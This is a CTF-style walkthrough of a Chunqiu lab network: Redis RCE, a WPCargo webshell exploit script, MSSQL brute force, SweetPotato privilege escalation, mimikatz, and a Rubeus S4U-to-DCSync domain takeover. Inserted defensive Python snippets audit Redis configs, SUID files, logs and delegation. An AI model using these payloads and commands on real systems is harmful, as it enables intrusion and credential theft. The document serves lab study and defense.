Initial port scan

sudo nmap --min-rate 10000 -p- 39.99.225.224
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-20 15:59 UTC
Nmap scan report for 39.99.225.224
Host is up (0.0086s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds
sudo ./fscan_386 -h 39.99.225.224
[sudo] mikannse 的密码:

fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.225.224 is alive
[*] Icmp alive hosts len is: 1
39.99.225.224:80 open
39.99.225.224:6379 open
39.99.225.224:21 open
39.99.225.224:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.225.224 code:200 len:4833 title:Welcome to CentOS
[+] Redis:39.99.225.224:6379 unauthorized file:/usr/local/redis/db/dump.rdb
[+] ftp://39.99.225.224:21:anonymous
[->]pub

Unauthenticated Redis (initial shell)

I get the feeling the nmap results against the Chunqiu (春秋) range boxes are not very accurate; maybe the usual parameters need tweaking.

There is an unauthenticated Redis instance: the Redis server exposed to the internet can be accessed without a password.

Fire up msf!

use exploit/linux/redis/redis_replication_cmd_exec

set rhost 39.99.225.224
rhost => 39.99.225.224
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 156.224.26.164
lhost => 156.224.26.164
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 156.224.26.164
srvhost => 156.224.26.164
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

One shot, done.
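The condition that makes this possible is a Redis instance reachable from the internet with no password and its admin commands intact, which is what the replication module abuses. The following added example (mine, not part of this writeup) audits a redis.conf for exactly those conditions; the two config fragments are constructed, and the checks correspond to Redis's own requirepass, bind, protected-mode and rename-command directives.

```python
# Constructed redis.conf fragments (not the lab's config): WEAK_CONF is the shape
# of an instance reachable without a password; HARDENED_CONF binds locally,
# requires auth and disables the admin commands the replication trick relies on.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass <long-random-secret>
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""
# Commands the SLAVEOF + CONFIG SET + rogue-master technique depends on.
DANGEROUS_COMMANDS = {"CONFIG", "SLAVEOF", "REPLICAOF", "MODULE"}

def parse_conf(text):
    """Return (directives, renamed): directive -> argument strings, and the set
    of commands disabled through rename-command <CMD> ""."""
    directives, renamed = {}, set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, *args = line.split()
        if key.lower() == "rename-command" and len(args) == 2 and args[1] in ('""', "''"):
            renamed.add(args[0].upper())
        directives.setdefault(key.lower(), []).append(" ".join(args))
    return directives, renamed

def audit_redis_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    d, renamed = parse_conf(text)
    findings = []
    if not any(d.get("requirepass", [])):
        findings.append("no requirepass: unauthenticated access")
    binds = " ".join(d.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind exposes the instance on all interfaces")
    if d.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode disabled")
    for cmd in sorted(DANGEROUS_COMMANDS - renamed):
        findings.append(f'{cmd} not disabled (rename-command {cmd} "")')
    return findings
```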

We are the redis user.

Go straight for SUID (SGID) binaries.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

base64 has the SUID bit set.

Read flag1

base64 "/home/redis/flag/flag01" | base64 --decode

flag{2bba2991-ab3d-4aea-965e-628a4e514759}
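As an added defensive counterpart to the find command above (mine, not from the writeup), this script reports set-uid/set-gid files that are not in a baseline of expected binaries; the baseline and the stat sample are constructed, and a base64 carrying the SUID bit is the kind of anomaly it surfaces.

```python
import os
import stat

# Constructed allowlist of set-id binaries a stock CentOS 7 host is expected
# to carry; build the real one from a known-good image of your own.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chage",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/crontab", "/usr/bin/ssh-agent", "/usr/sbin/unix_chkpwd",
}

def has_setid(mode):
    """True when a regular file carries the set-uid or set-gid bit."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def unexpected_setid(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode). Returns the set-id files that are
    not in the baseline, i.e. the find output above minus what a stock install
    is expected to have."""
    return sorted(p for p, m in entries if has_setid(m) and p not in baseline)

def walk_modes(root="/"):
    """Yield (path, st_mode) for every file under root, skipping pseudo
    filesystems and anything we cannot stat."""
    skip = {"/proc", "/sys", "/dev", "/run"}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in skip:
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue

# Constructed stat results: stock binaries plus a base64 given the set-uid bit
# (0o104755 = regular file, SUID, rwxr-xr-x) and a set-gid wall.
SAMPLE = [
    ("/usr/bin/sudo", 0o104111),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/base64", 0o104755),
    ("/usr/bin/ls", 0o100755),
    ("/usr/bin/wall", 0o102555),
]

if __name__ == "__main__":
    # Against the live filesystem use: unexpected_setid(walk_modes())
    for path in unexpected_setid(SAMPLE):
        print("unexpected set-id binary:", path)
```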

Lateral movement

Upload an fscan binary; in meterpreter you can use upload directly.

fscan_386

The upload is a bit slow, but no matter.

ip a

172.22.2.7/16, so the subnet is 172.22.0.0.

./fscan_386 -h 172.22.0.0/16

But for some reason it never found anything; looking at the writeups, everyone scanned a /24.

./fscan_386 -h 172.22.2.0/24

fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.18 is alive
[*] Icmp alive hosts len is: 3
172.22.2.16:1433 open
172.22.2.18:445 open
172.22.2.16:445 open
172.22.2.18:139 open
172.22.2.16:139 open
172.22.2.16:135 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:6379 open
[*] alive ports len is: 12
start vulscan
[*] NetInfo:
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点

The results came back very quickly.

Pivoting into the internal network

Try setting up a SOCKS proxy with msf.

In meterpreter:

Check the route table with route: 172.22.0.0

But the route here has to be set to 172.22.2.0; damn it, setting it to 172.22.0.0 does not work and I just wasted my time. I tried a pile of pivoting methods and in the end went back to msf for the pivot.

run autoroute -s 172.22.2.0
background
use auxiliary/server/socks_proxy

Just run it; the default port is 1080, and ss -tlnp on the VPS shows port 1080 listening.

Set up a proxy with proxychains.

proxychains wpscan --url http://172.22.2.18

A wpcargo plugin is found.

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    # 8-bit binary string per byte; '0' bits become 'x' (black pixels), '1' bits stay white
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

# Base URL must end with '/' so the plugin path below is appended correctly.
destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

Run the exploit; it automatically writes a one-line webshell. Open a proxy in AntSword (蚁剑) and connect directly.

http://172.22.2.18/webshell.php?1=system

The password is 2, and the connection type has to be set to CMDLINUX.
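On the defender's side, the write through barcode.php leaves a distinctive trace in the web server's access log: a filepath parameter that legitimate barcode rendering never sends, followed by requests for the file it wrote. The following added example (mine, not from the writeup or the plugin) flags both; the log lines are constructed and the web root /var/www/html is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
# Combined-log-format prefix: client, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed access-log sample (not from the target): a normal barcode render,
# the unauthenticated write of webshell.php into the web root, and the POST
# that drives the dropped file.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Oct/2023:16:10:01 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=TRACK123&size=3 HTTP/1.1" 200 912 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Oct/2023:16:12:44 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1xxx1x1&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 71 "-" "python-requests/2.31"
10.0.0.9 - - [20/Oct/2023:16:12:45 +0000] "POST /webshell.php?1=system HTTP/1.1" 200 188 "-" "python-requests/2.31"
"""

def analyse_line(line):
    """Return a finding for one line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    if url.path.endswith("/wpcargo/includes/barcode.php"):
        # Legitimate rendering never passes filepath; a .php destination is
        # the arbitrary-file-write pattern the exploit above relies on.
        for fp in parse_qs(url.query).get("filepath", []):
            sev = "CRITICAL" if unquote(fp).lower().endswith(".php") else "WARN"
            return f"{sev} {client} barcode.php write to {unquote(fp)} (HTTP {status})"
    return None

def find_dropped_files(lines, web_root="/var/www/html"):
    """Second pass: URL paths written through barcode.php, then any later
    request that fetches one of them (the webshell being used)."""
    written, hits = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        url = urlsplit(target)
        for fp in parse_qs(url.query).get("filepath", []):
            fp = unquote(fp)
            if fp.startswith(web_root + "/"):   # assumed web root -> URL path
                written.add(fp[len(web_root):])
        if url.path in written:
            hits.append(f"{client} {method} {url.path} -> HTTP {status}")
    return hits

def scan(log_text):
    lines = log_text.splitlines()
    return [f for f in map(analyse_line, lines) if f], find_dropped_files(lines)
```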

Sensitive database information is found in /var/www/html/wp-config.php

define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

A connection can be added in AntSword's database management.

Find the second flag

flag{c757e423-eb44-459c-9c63-7625009910d8}

MSSQL

There is also a table named “S0meth1ng_y0u_m1ght_1ntereSted”.

Export it as a wordlist

Brute-force with fscan:

proxychains ./fscan -h 172.22.2.16 -m mssql -pwdf 1.txt

This yields ElGNkOiC.

Connect with MDUT; that Old Auto… component has to be enabled.

This account also turns out to have the impersonate-token privilege, so upload SweetPotato.

The flag cannot be read directly, so add an admin user.

C:/Users/Public/SweetPotato.exe -a "net user mikannse qwer1234! /add"

C:/Users/Public/SweetPotato.exe -a "net localgroup administrators mikannse /add"

I used xfreerdp to RDP into 172.22.2.16 and found the third flag.

flag{e90abf17-d2b0-4070-a3e6-ce20c13c625a}

Compromising the domain controller

proxychains xfreerdp /v:172.22.2.16 /u:mikannse /p:qwer1234! /cert-ignore /drive:share1,/tmp

Enable the drive share directly, then upload mimikatz and run it as administrator.

privilege::debug

sekurlsa::logonpasswords

Find the hash of the MSSQLSERVER$ account.

I don't understand this part, so I'm just copying the writeup.

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:1400900feabf5d233a9c1ec534105274 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 ticket>

This extends administrator privileges over the domain controller.

Then

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Get domain admin access

proxychains wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3
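The chain above is constrained delegation with protocol transition (MSSQLSERVER$ allowed to delegate to LDAP on the DC) followed by a DCSync. As an added example (mine, not from the writeup), the code below shows the two checks a defender would run: accounts whose msDS-AllowedToDelegateTo points at a DC's LDAP SPN, and Event ID 4662 replication rights used by accounts that are not DCs. The directory objects, userAccountControl values and event records are constructed.

```python
# Constructed directory objects (not pulled from the lab): the attribute names
# are real AD attributes; the values, including the account flags, are assumed.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # userAccountControl: protocol transition
DC_HOSTS = {"dc.xiaorang.lab"}

ACCOUNTS = [
    {"sAMAccountName": "MSSQLSERVER$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["LDAP/DC.xiaorang.lab", "LDAP/DC"]},
    {"sAMAccountName": "UBUNTU-WEB02$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": []},
]

def delegation_findings(accounts, dc_hosts=DC_HOSTS):
    """Flag accounts whose constrained delegation targets a DC's LDAP service;
    with protocol transition that is the S4U path used above to reach DCSync."""
    out = []
    for a in accounts:
        transition = bool(a.get("userAccountControl", 0) & TRUSTED_TO_AUTH_FOR_DELEGATION)
        for spn in a.get("msDS-AllowedToDelegateTo", []):
            svc, _, host = spn.partition("/")
            if svc.upper() == "LDAP" and host.lower() in dc_hosts:
                out.append((a["sAMAccountName"], spn,
                            "protocol transition" if transition else "kerberos-only"))
    return out

# Event ID 4662: the replication control-access rights a DCSync needs.
# Only DCs (and known replication accounts) should ever exercise them.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
ALLOWED_REPLICATORS = {"DC$"}

# Constructed 4662 records reduced to the two fields that matter here.
EVENTS = [
    {"SubjectUserName": "DC$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "Administrator", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "Administrator", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

def dcsync_suspects(events, allowed=ALLOWED_REPLICATORS):
    """Return (subject, right) pairs for replication rights used by accounts
    that are not expected to replicate the directory."""
    hits = []
    for e in events:
        props = e["Properties"].lower()
        for guid, name in REPL_GUIDS.items():
            if guid in props and e["SubjectUserName"] not in allowed:
                hits.append((e["SubjectUserName"], name))
    return hits
```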

Fourth flag

flag{b8fee5ad-a9c7-48ec-9ad1-d24350b1a055}

Ramblings

This room really had me trying several different pivoting methods, and I have become much more comfortable with pivoting. Although I still had no real idea what I was doing on the domain controller part at the end, oh well.